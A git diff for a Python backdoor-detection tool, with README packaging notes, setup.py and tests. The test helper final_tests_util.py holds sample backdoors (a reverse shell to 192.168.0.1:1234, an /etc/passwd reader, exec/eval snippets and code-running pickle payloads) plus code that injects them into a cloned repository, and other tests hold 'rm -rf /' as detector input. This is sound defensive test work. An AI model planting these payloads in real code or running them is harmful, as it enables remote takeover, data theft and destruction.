本项目支持打包作为`pip`包进行发布
|
||||
|
||||
- **主要应用**:
|
||||
- `pip`通过`wheel`并自行撰写`setup.py`以及`MANIFEST.in`,将项目打包发布
|
||||
|
||||
## 9. 反汇编
|
||||
|
||||
项目通过`uncompyle6`库提供的反汇编模块可以实现对python字节码进行反汇编之后扫描危险代码
|
||||
|
||||
## 10. 代码和风险分析
|
||||
|
||||
项目中实现了基本的静态代码分析功能,用于识别和报告潜在的安全风险函数调用,如 `system`、`exec` 等。
|
||||
|
||||
|
||||
@@ -2,31 +2,68 @@
|
||||
|
||||
本文档提供了后门检测系统的使用方法,包括依赖版本漏洞检测和静态代码后门检测两部分。这将帮助用户正确执行安全检测,并理解输出结果。
|
||||
|
||||
## 安装需求
|
||||
|
||||
在开始使用本系统之前,请确保您的环境中安装了以下依赖:
|
||||
|
||||
- Python 3.6 或更高版本
|
||||
- `packaging` 库:用于版本控制和比较
|
||||
- `reportlab` 库:用于生成 PDF 报告
|
||||
|
||||
您可以通过以下命令安装必要的 Python 库:
|
||||
|
||||
```bash
|
||||
pip install packaging reportlab
|
||||
```
|
||||
|
||||
## 下载和配置
|
||||
|
||||
- 克隆或下载后门检测系统到您的本地环境。
|
||||
- 确保脚本文件 (`requirements_detection.py` 和 `backdoor_detection.py`) 在您的工作目录中。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 运行依赖版本漏洞检测脚本
|
||||
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python requirements_detection.py <requirements_file> -o <output_file>
|
||||
python -m detection.requirements_detection <requirements_file> -o <output_file>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
@@ -37,7 +74,7 @@ python requirements_detection.py <requirements_file> -o <output_file>
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python requirements_detection.py requirements.txt -o output/report.md
|
||||
python -m detection.requirements_detection requirements.txt -o output/report.md
|
||||
```
|
||||
|
||||
## 运行静态代码后门检测脚本
|
||||
@@ -45,7 +82,7 @@ python requirements_detection.py requirements.txt -o output/report.md
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python backdoor_detection.py <code_path> -o <output_file> -m <mode>
|
||||
python -m detection <code_path> -o <output_file> -m <mode>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
@@ -57,7 +94,7 @@ python backdoor_detection.py <code_path> -o <output_file> -m <mode>
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python backdoor_detection.py ./src -o output/report.pdf -m regex
|
||||
python -m detection ./src -o output/report.pdf -m regex
|
||||
```
|
||||
|
||||
## 结果解读
|
||||
|
||||
@@ -2,4 +2,6 @@ reportlab
|
||||
requests
|
||||
packaging
|
||||
openai
|
||||
bs4
|
||||
bs4
|
||||
colorama
|
||||
tqdm
|
||||
44
setup.py
Normal file
44
setup.py
Normal file
@@ -0,0 +1,44 @@
|
||||
# pip install wheel
|
||||
# python setup.py sdist bdist_wheel
|
||||
|
||||
from setuptools import setup, find_packages
|
||||
|
||||
|
||||
def read_file(filename: str) -> str:
|
||||
"""Read a file and return its content as a string.
|
||||
|
||||
Args:
|
||||
filename (str): The name of the file to read.
|
||||
|
||||
Returns:
|
||||
str: The content of the file.
|
||||
"""
|
||||
with open(filename, encoding="utf-8") as f:
|
||||
return f.read()
|
||||
|
||||
|
||||
setup(
|
||||
name="backdoor_buster",
|
||||
version="0.1.0",
|
||||
author="ciscn",
|
||||
description="A tool for integrated backdoor detection",
|
||||
long_description=read_file("README.md"),
|
||||
long_description_content_type="text/markdown",
|
||||
url="https://git.mamahaha.work/sangge/BackDoorBuster",
|
||||
packages=find_packages(),
|
||||
classifiers=[
|
||||
"Programming Language :: Python :: 3",
|
||||
"License :: OSI Approved :: MIT License",
|
||||
"Operating System :: OS Independent",
|
||||
],
|
||||
python_requires=">=3.6",
|
||||
install_requires=[
|
||||
"reportlab",
|
||||
"requests",
|
||||
"packaging",
|
||||
"openai",
|
||||
"bs4",
|
||||
"tqdm",
|
||||
"colorama",
|
||||
],
|
||||
)
|
||||
159
tests/final_tests_util.py
Normal file
159
tests/final_tests_util.py
Normal file
@@ -0,0 +1,159 @@
|
||||
from typing import Tuple, List
|
||||
from git import Repo # type: ignore
|
||||
import random
|
||||
from pathlib import Path
|
||||
import pickle
|
||||
import os
|
||||
import py_compile
|
||||
|
||||
|
||||
def clone_repo(repo_url: str, clone_dir: str) -> None:
|
||||
"""
|
||||
Clone a Git repository to the specified directory.
|
||||
|
||||
Args:
|
||||
repo_url (str): The URL of the Git repository to clone.
|
||||
clone_dir (str): The directory where the repository should be cloned.
|
||||
"""
|
||||
try:
|
||||
Repo.clone_from(repo_url, clone_dir, depth=1)
|
||||
except Exception as e:
|
||||
print(f"Error cloning repository: {e}")
|
||||
|
||||
|
||||
# a return type of backdoor. Include injected file name and number.
|
||||
|
||||
|
||||
def inject_random_backdoor(
|
||||
path: str, sample_rate: float = 0.1
|
||||
) -> Tuple[Tuple[str, int], ...]:
|
||||
"""
|
||||
Insert random backdoor into the path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
pickle (bool): Whether to insert a backdoor into a pickle file.
|
||||
pyc (bool): Whether to insert a backdoor into a compiled Python file.
|
||||
"""
|
||||
project_path = Path(path)
|
||||
all_python_files = list(project_path.rglob("*.py"))
|
||||
injected_python_files = []
|
||||
|
||||
for python_file in all_python_files:
|
||||
# sample files to inject backdoor
|
||||
if random.random() < sample_rate:
|
||||
injected_python_files.append(python_file)
|
||||
injectedNum = len(injected_python_files)
|
||||
|
||||
results: List[Tuple[str, int]] = []
|
||||
# inject backdoor
|
||||
for python_file in injected_python_files:
|
||||
with open(python_file, "r+", errors="ignore") as f:
|
||||
lines = f.readlines()
|
||||
total_lines = len(lines)
|
||||
inject_line_number = random.randint(0, total_lines)
|
||||
# choose random backdoor
|
||||
inject_code = random.choice(backdoors)
|
||||
lines.insert(inject_line_number, inject_code + "\n")
|
||||
f.seek(0)
|
||||
f.writelines(lines)
|
||||
results.append((str(python_file), inject_line_number))
|
||||
|
||||
return tuple(results)
|
||||
|
||||
|
||||
# 示例1: 通过 os.system 执行命令
|
||||
backdoor1 = """import os
|
||||
os.system('ls')"""
|
||||
|
||||
# 示例2: 通过 subprocess 模块执行命令
|
||||
backdoor2 = """import subprocess
|
||||
subprocess.call(['ls', '-l'])"""
|
||||
|
||||
# 示例3: 打开一个反向 shell
|
||||
backdoor3 = """import socket,subprocess,os
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.connect(("192.168.0.1",1234))
|
||||
os.dup2(s.fileno(),0)
|
||||
os.dup2(s.fileno(),1)
|
||||
os.dup2(s.fileno(),2)
|
||||
subprocess.call(["/bin/sh","-i"])"""
|
||||
|
||||
# 示例4: 通过 eval 执行任意代码
|
||||
backdoor4 = """code = "print('Hello, World!')"
|
||||
eval(code)"""
|
||||
|
||||
# 示例5: 通过 exec 执行任意代码
|
||||
backdoor5 = """code = '''
|
||||
import os
|
||||
os.system('ls')
|
||||
'''
|
||||
exec(code)"""
|
||||
|
||||
|
||||
# 示例7: 读取并显示文件内容
|
||||
backdoor7 = """with open('/etc/passwd', 'r') as file:
|
||||
data = file.read()
|
||||
print(data)"""
|
||||
|
||||
|
||||
backdoors = [
|
||||
backdoor1,
|
||||
backdoor2,
|
||||
backdoor3,
|
||||
backdoor4,
|
||||
backdoor5,
|
||||
backdoor7,
|
||||
]
|
||||
|
||||
backdoors_pickle = [
|
||||
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.',
|
||||
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.',
|
||||
b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.',
|
||||
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.'
|
||||
]
|
||||
def inject_pickle_backdoor(root_path: str) -> None:
|
||||
"""
|
||||
Generate a pickle backdoor and insert it into the specified path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
"""
|
||||
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
|
||||
paths = random.sample(all_path, random.randrange(1, len(all_path)))
|
||||
for path in paths:
|
||||
backdoor_id = random.randrange(0, len(backdoors_pickle))
|
||||
backdoor = backdoors_pickle[backdoor_id]
|
||||
filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
|
||||
with open(filename, "wb") as f:
|
||||
pickle.dump(backdoor, f)
|
||||
|
||||
|
||||
def inject_pyc_backdoor(root_path: str) -> None:
|
||||
"""
|
||||
Generate a pyc backdoor and insert it into the specified path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
"""
|
||||
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
|
||||
paths = random.sample(all_path, random.randrange(1, len(all_path)))
|
||||
|
||||
for path in paths:
|
||||
backdoor_id = random.randrange(0, len(backdoors))
|
||||
backdoor = backdoors[backdoor_id]
|
||||
py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
|
||||
pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
|
||||
with open(py_filename, "w") as f:
|
||||
f.write(backdoor)
|
||||
|
||||
py_compile.compile(py_filename, cfile=pyc_filename)
|
||||
os.remove(py_filename)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
repo_url = "https://github.com/TheAlgorithms/Python.git"
|
||||
clone_dir = "/tmp/repo"
|
||||
clone_repo(repo_url, clone_dir)
|
||||
inject_random_backdoor(clone_dir)
|
||||
inject_pickle_backdoor(clone_dir)
|
||||
40
tests/test_CN_GPT_detection.py
Normal file
40
tests/test_CN_GPT_detection.py
Normal file
@@ -0,0 +1,40 @@
|
||||
import unittest
|
||||
import warnings
|
||||
import os
|
||||
import json
|
||||
|
||||
from detection.cngptdetection import detectGPT
|
||||
|
||||
class TestBackdoorDetection(unittest.TestCase):
|
||||
def test_gpt_risk_detection(self):
|
||||
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
|
||||
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
|
||||
content = """import os
|
||||
os.system('rm -rf /') # high risk
|
||||
exec('print("Hello")') # high risk
|
||||
eval('2 + 2') # high risk
|
||||
"""
|
||||
results1 = detectGPT(content)
|
||||
classified_results = json.loads(results1)
|
||||
self.assertEqual(len(classified_results["high"]), 3)
|
||||
|
||||
def test_gpt_no_risk_detection(self):
|
||||
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
|
||||
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
|
||||
content = """a = 10
|
||||
b = a + 5
|
||||
print('This should not be detected as risky.')
|
||||
"""
|
||||
results2 = detectGPT(content)
|
||||
classified_results = json.loads(results2)
|
||||
self.assertEqual(len(classified_results["high"]), 0)
|
||||
self.assertEqual(len(classified_results["medium"]), 0)
|
||||
self.assertEqual(len(classified_results["low"]), 0)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
@@ -1,7 +1,7 @@
|
||||
import unittest
|
||||
import warnings
|
||||
|
||||
from detection.backdoor_detection import find_dangerous_functions
|
||||
from detection.__main__ import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
import os
|
||||
|
||||
@@ -90,6 +90,23 @@ class TestBackdoorDetection(unittest.TestCase):
|
||||
with self.assertRaises(ValueError):
|
||||
detectGPT(content)
|
||||
|
||||
def test_find_dangerous_functions_pyc(self):
|
||||
file_content = """import os
|
||||
os.system('rm -rf /')
|
||||
"""
|
||||
file_extension = ".pyc"
|
||||
|
||||
expected_result = {
|
||||
"high": [(2, "os.system('rm -rf /')")],
|
||||
"medium": [],
|
||||
"low": [],
|
||||
"none": [],
|
||||
}
|
||||
|
||||
result = find_dangerous_functions(file_content, file_extension)
|
||||
|
||||
self.assertEqual(result, expected_result)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
|
||||
168
tests/test_final_tests.py
Normal file
168
tests/test_final_tests.py
Normal file
@@ -0,0 +1,168 @@
|
||||
import time
|
||||
import unittest
|
||||
import shutil
|
||||
import os
|
||||
import threading
|
||||
import re
|
||||
|
||||
from detection.utils import read_file_content
|
||||
from .final_tests_util import (
|
||||
clone_repo,
|
||||
Path,
|
||||
inject_pickle_backdoor,
|
||||
inject_random_backdoor,
|
||||
inject_pyc_backdoor,
|
||||
backdoors,
|
||||
)
|
||||
from detection.Regexdetection import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
results = []
|
||||
threads = []
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread(), args=(content, results)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.5)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(content, results):
|
||||
try:
|
||||
results.append(detectGPT(content))
|
||||
except Exception as e:
|
||||
print(e)
|
||||
|
||||
|
||||
class TestFinalTests(unittest.TestCase):
|
||||
def setUp(self) -> None:
|
||||
self.path = "./tmp/repo/"
|
||||
shutil.rmtree(self.path, ignore_errors=True)
|
||||
if not os.path.exists("/tmp/Python/"):
|
||||
clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python")
|
||||
shutil.copytree("/tmp/Python", self.path)
|
||||
sampleRate = 0.1
|
||||
|
||||
# TODO
|
||||
# preproccessing
|
||||
|
||||
self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate)
|
||||
self.pickle_true_num = inject_pickle_backdoor(self.path)
|
||||
self.pyc_true_num = inject_pyc_backdoor(self.path)
|
||||
self.injectedNum = len(self.inject_result)
|
||||
print(self.injectedNum)
|
||||
project_path = Path(self.path)
|
||||
|
||||
self.all_python_files = list(project_path.rglob("*.py"))
|
||||
self.py_files_num = len(self.all_python_files)
|
||||
|
||||
all_pickle_files = list(project_path.rglob("*.pickle"))
|
||||
self.pickle_files_num = len(all_pickle_files)
|
||||
|
||||
all_pyc_files = list(project_path.rglob("*.pyc"))
|
||||
self.pyc_files_num = len(all_pyc_files)
|
||||
|
||||
os.system(
|
||||
"python -m detection " + self.path + " -o " + self.path + "output.txt"
|
||||
)
|
||||
|
||||
def test_final_tests_pycode(self):
|
||||
# test backdoor code in python files
|
||||
detectedNum = 0
|
||||
possibly_dangerous_file = []
|
||||
for file in self.all_python_files:
|
||||
content = read_file_content(str(file))
|
||||
results = find_dangerous_functions(content, ".py")
|
||||
if (
|
||||
len(results["high"]) > 0
|
||||
or len(results["medium"]) > 0
|
||||
or len(results["low"]) > 0
|
||||
):
|
||||
detectedNum += 1
|
||||
possibly_dangerous_file.append(file)
|
||||
print(detectedNum / self.py_files_num)
|
||||
GPTdetectedNum = 0
|
||||
|
||||
for i in possibly_dangerous_file:
|
||||
content = read_file_content(str(i))
|
||||
results = {}
|
||||
try:
|
||||
results = detectGPT(content)
|
||||
if (
|
||||
len(results["high"]) > 0
|
||||
or len(results["medium"]) > 0
|
||||
or len(results["low"]) > 0
|
||||
):
|
||||
GPTdetectedNum += 1
|
||||
print(GPTdetectedNum)
|
||||
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
pass
|
||||
|
||||
# test injected code
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
injected_detected_num = 0
|
||||
injected_correct_num = 0
|
||||
pattern = r"\w+\.py: Line \d+: (.+)"
|
||||
for line in lines:
|
||||
if "py:" in line:
|
||||
injected_detected_num += 1
|
||||
match = re.search(pattern, line)
|
||||
command = ""
|
||||
if match:
|
||||
command = match.group(1)
|
||||
for backdoor in backdoors:
|
||||
if command in backdoor:
|
||||
injected_correct_num += 1
|
||||
break
|
||||
|
||||
injected_accurency = injected_detected_num / self.py_files_num
|
||||
print(f"injected files accurency: {injected_accurency}")
|
||||
try:
|
||||
GPTresult = GPTdetectFileList(possibly_dangerous_file)
|
||||
for result in GPTresult:
|
||||
if len(result) > 0:
|
||||
GPTdetectedNum += 1
|
||||
print(GPTdetectedNum)
|
||||
self.assertGreaterEqual(GPTdetectedNum, detectedNum)
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
pass
|
||||
|
||||
# test pickle files
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
pickle_detected_num = 0
|
||||
pickle_correct_num = 0
|
||||
for line in lines:
|
||||
if "pickle" in line:
|
||||
pickle_detected_num += 1
|
||||
if re.search(r"backdoor\d*\.pickle", line):
|
||||
pickle_correct_num += 1
|
||||
|
||||
pickle_accurency = pickle_detected_num / self.pickle_true_num
|
||||
print(f"pickle files accurency: {pickle_accurency}")
|
||||
|
||||
# test pyc files
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
pyc_detected_num = 0
|
||||
pyc_correct_num = 0
|
||||
for line in lines:
|
||||
if "pyc" in line:
|
||||
pyc_detected_num += 1
|
||||
if re.search(r"backdoor\d*\.pyc", line):
|
||||
pyc_correct_num += 1
|
||||
pyc_accurency = pyc_detected_num / self.pyc_true_num
|
||||
print(f"pyc files accurency: {pyc_accurency}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
56
tests/test_pickle_detection.py
Normal file
56
tests/test_pickle_detection.py
Normal file
@@ -0,0 +1,56 @@
|
||||
import unittest
|
||||
import pickle
|
||||
import tempfile
|
||||
from detection.pickle_detection import pickleScanner, pickleDataDetection
|
||||
from unittest.mock import patch
|
||||
|
||||
|
||||
class TestPickleScanner(unittest.TestCase):
|
||||
|
||||
def setUp(self):
|
||||
# Create temporary files with valid and malicious data
|
||||
self.valid_data = {"key": "value"}
|
||||
self.malicious_data = b"\x80\x03csubprocess\ncheck_output\nq\x00X\x05\x00\x00\x00echo 1q\x01\x85q\x02Rq\x03."
|
||||
|
||||
self.valid_file = tempfile.NamedTemporaryFile(delete=False)
|
||||
self.valid_file.write(pickle.dumps(self.valid_data))
|
||||
self.valid_file.close()
|
||||
|
||||
self.malicious_file = tempfile.NamedTemporaryFile(delete=False)
|
||||
self.malicious_file.write(self.malicious_data)
|
||||
self.malicious_file.close()
|
||||
|
||||
def tearDown(self):
|
||||
# Clean up temporary files
|
||||
import os
|
||||
|
||||
os.remove(self.valid_file.name)
|
||||
os.remove(self.malicious_file.name)
|
||||
|
||||
def test_valid_pickle(self):
|
||||
with open(self.valid_file.name, "rb") as file:
|
||||
scanner = pickleScanner(file)
|
||||
print(scanner.maliciousModule)
|
||||
scanner.load()
|
||||
output = scanner.output()
|
||||
self.assertEqual(output["ReduceCount"], 0)
|
||||
self.assertEqual(output["maliciousModule"], [])
|
||||
|
||||
def test_malicious_pickle(self):
|
||||
with open(self.malicious_file.name, "rb") as file:
|
||||
scanner = pickleScanner(file)
|
||||
scanner.load()
|
||||
output = scanner.output()
|
||||
self.assertEqual(output["ReduceCount"], 1)
|
||||
self.assertIn(("subprocess", "check_output"), output["maliciousModule"])
|
||||
|
||||
@patch("builtins.print")
|
||||
def test_pickleDataDetection_no_output_file(self, mock_print):
|
||||
# test output to stdout if filename is not given
|
||||
with patch("builtins.print") as mock_print:
|
||||
pickleDataDetection(self.valid_file.name)
|
||||
mock_print.assert_called_once()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
Reference in New Issue
Block a user